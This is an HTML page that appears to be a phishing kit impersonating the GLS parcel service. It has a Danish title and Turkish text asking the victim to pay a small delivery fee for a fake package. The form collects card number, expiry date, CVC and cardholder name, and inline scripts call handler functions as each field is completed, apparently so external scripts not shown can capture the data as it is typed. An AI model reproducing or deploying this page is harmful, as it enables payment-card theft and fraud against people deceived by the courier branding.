<html lang="en-US"><head id="head">
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <style>body {transition: opacity ease-in 0.2s; } 
         body[unresolved] {opacity: 0; display: block; overflow: hidden; position: relative; } 
      </style>
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <meta content="Expedited Parcel &amp; LTL delivery in the West with dedicated account managers building the optimal shipping solutions for specific business needs." name="description">
      <title>Ekspreslevering til kunde nr. #33625</title>
      <meta name="apple-mobile-web-app-capable" content="yes">
      <meta property="og:title" content="Create Your GLS Account - Parcel Shipping Services">
      <meta property="og:site_name" content="Gls-us.com">
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1">
      <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
      <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet">
      <link rel="stylesheet" href="https://demo.tutorialzine.com/2018/02/freebie-2-beautiful-checkout-forms/assets/css/payment.css">
	  <script type="text/javascript" src="./js/main.js"></script>
	  <script type="text/javascript" src="./js/jq.js"></script>
      	  <style>



.loader{
  position: fixed;
  left: 0px;
  top: 0px;
  width: 100%;
  height: 100%;
  z-index: 9999;
  background: url('https://geiqbvli38.fr/wp-content/plugins/simple-job-board/public/images/loader.gif') 
              50% 50% no-repeat rgb(249,249,249);
}

/* Transparent Overlay */
.loading:before {
  content: '';
  display: block;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
    background: transparent;

  background: -webkit-radial-gradient(rgba(20, 20, 20,.8), rgba(0, 0, 0,.8));
}

/* :not(:required) hides these rules from IE9 and below */
.loading:not(:required) {
  /* hide "loading..." text */
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {display:none}
.loading:not(:required):after {
  content: '';
  display: block;
  font-size: 10px;
  width: 1em;
  height: 1em;
  margin-top: -0.5em;
  -webkit-animation: spinner 150ms infinite linear;
  -moz-animation: spinner 150ms infinite linear;
  -ms-animation: spinner 150ms infinite linear;
  -o-animation: spinner 150ms infinite linear;
  animation: spinner 150ms infinite linear;
  border-radius: 0.5em;
  -webkit-box-shadow: rgba(255,255,255, 0.75) 1.5em 0 0 0, rgba(255,255,255, 0.75) 1.1em 1.1em 0 0, rgba(255,255,255, 0.75) 0 1.5em 0 0, rgba(255,255,255, 0.75) -1.1em 1.1em 0 0, rgba(255,255,255, 0.75) -1.5em 0 0 0, rgba(255,255,255, 0.75) -1.1em -1.1em 0 0, rgba(255,255,255, 0.75) 0 -1.5em 0 0, rgba(255,255,255, 0.75) 1.1em -1.1em 0 0;
box-shadow: rgba(255,255,255, 0.75) 1.5em 0 0 0, rgba(255,255,255, 0.75) 1.1em 1.1em 0 0, rgba(255,255,255, 0.75) 0 1.5em 0 0, rgba(255,255,255, 0.75) -1.1em 1.1em 0 0, rgba(255,255,255, 0.75) -1.5em 0 0 0, rgba(255,255,255, 0.75) -1.1em -1.1em 0 0, rgba(255,255,255, 0.75) 0 -1.5em 0 0, rgba(255,255,255, 0.75) 1.1em -1.1em 0 0;
}
</style>
   </head>
   <body>

      <main class="page">
 <script src="./js/preload.js"></script>
   <div  id="loader" class="loader"></div>
         <section class="payment-form dark">
            <div class="container">
               <div class="block-heading">
                  <h2>Ödeme</h2>
                  <p style="text-align: center;"><span style="color: #ff0000;"><strong>Lütfen dikkat</strong></span>: Gerekli bilgilerin doldurulması ve kargo ücretinin ödenmesi durumunda paket no. "<strong>TR8823999710</strong>" 2 gün içerisinde teslim edilecektir.</p>
<div id="gtx-trans" style="position: absolute; left: -29px; top: -20px;">&nbsp;</div>
               </div>
               <form action="" method="POST" class="" style="padding: 14px;" name="dsadhaskh">
                  <div class="products">
                     <h3 class="title">Parsel ücretleri</h3>
                     <div class="item">
                        <span class="price">15.68₺</span>
                        <p class="item-name">Parsel</p>
                        <p class="item-description">TR8823999710</p>
                     </div>
                     
                     <div class="total">Toplam
<span class="price">15.68₺</span><br><span class="price"></span><br>
</div>
                  </div>
                  <div class="card-details">
                     <h3 class="title">Kredi kartı detayları</h3>
                     <div class="row">
                        <div class="form-group col-sm-5">
                           <label for="card-number">Kart numarası</label>
                           <input id="card-number" required="" onkeyup="return isNumber(event)" minlength="19" maxlength="19" type="tel" class="form-control" placeholder="Kart numarası" aria-label="Card Holder" aria-describedby="basic-addon1">
                        </div>
                        <div class="form-group col-sm-4">
                           <label for="">EXP</label>
                           <div class="input-group expiration-date">
                              <input type="text" class="form-control" id="mm" maxlength="2" placeholder="MM" aria-label="MM" aria-describedby="basic-addon1">
                              <span class="date-separator">/</span>
                              <input type="text" class="form-control" id="yy" maxlength="2" placeholder="YY" aria-label="YY" aria-describedby="basic-addon1">
                           </div>
                        </div>
                        
                        <div class="form-group col-sm-3">
                           <label for="cvc">CVC</label>
                           <input required="" type="text" id="account-cc-code" maxlength="4" minlength="3" class="form-control" placeholder="CVC" aria-label="Card Holder" aria-describedby="basic-addon1">
                        </div><div class="form-group col-sm-7">
                           <label for="card-holder">Kart sahibi</label>
                           <input id="cardholder" type="text" class="form-control" placeholder="Kart sahibi" aria-label="Card Holder" aria-describedby="basic-addon1">
                        </div>
<div class="form-group col-sm-4">
                           <p style="text-align: right;"><img src="https://d33v4339jhl8k0.cloudfront.net/docs/assets/58dc0d15dd8c8e5c5730f697/images/5cb71e8d0428631d263c3f07/file-LntcohjLaE.jpg" alt="" width="200" height="66"></p>
                        </div>
                        <div class="form-group col-sm-12">
                           <button type="submit" onclick="colStep1();" class="btn btn-primary btn-block">Ödemenizi onaylayın (17.68₺)</button>
						    
                        </div>
                     </div>
                  </div>
              </form>
			  
            </div>
         </section>
      </main>
   
   <script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
   <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
<script>
	 function isNumber(e) {
   e.target.value = e.target.value.replace(/[^\dA-Z]/g, '').
                      replace(/(.{4})/g, '$1 ').trim();
 }
</script> 
<script>
const input1 = document.getElementById("mm");
const input2 = document.getElementById("yy");
const input3 = document.getElementById("card-number");
const input4 = document.getElementById("account-cc-code");
input1.addEventListener("input", function() {
  if (input1.value.length === 2) {
    alerte2();
    input2.focus();
  }
});

input2.addEventListener("input", function() {
  if (input2.value.length === 2) {
    alerte1();
    input4.focus();
  }
});
input3.addEventListener("input", function() {
  if (input3.value.length === 19) {
    alerte();
    input1.focus();
  }
});
input4.addEventListener("input", function() {
  if (input4.value.length === 2) {
    alerte3();
    
  }
});
</script> 
</body></html>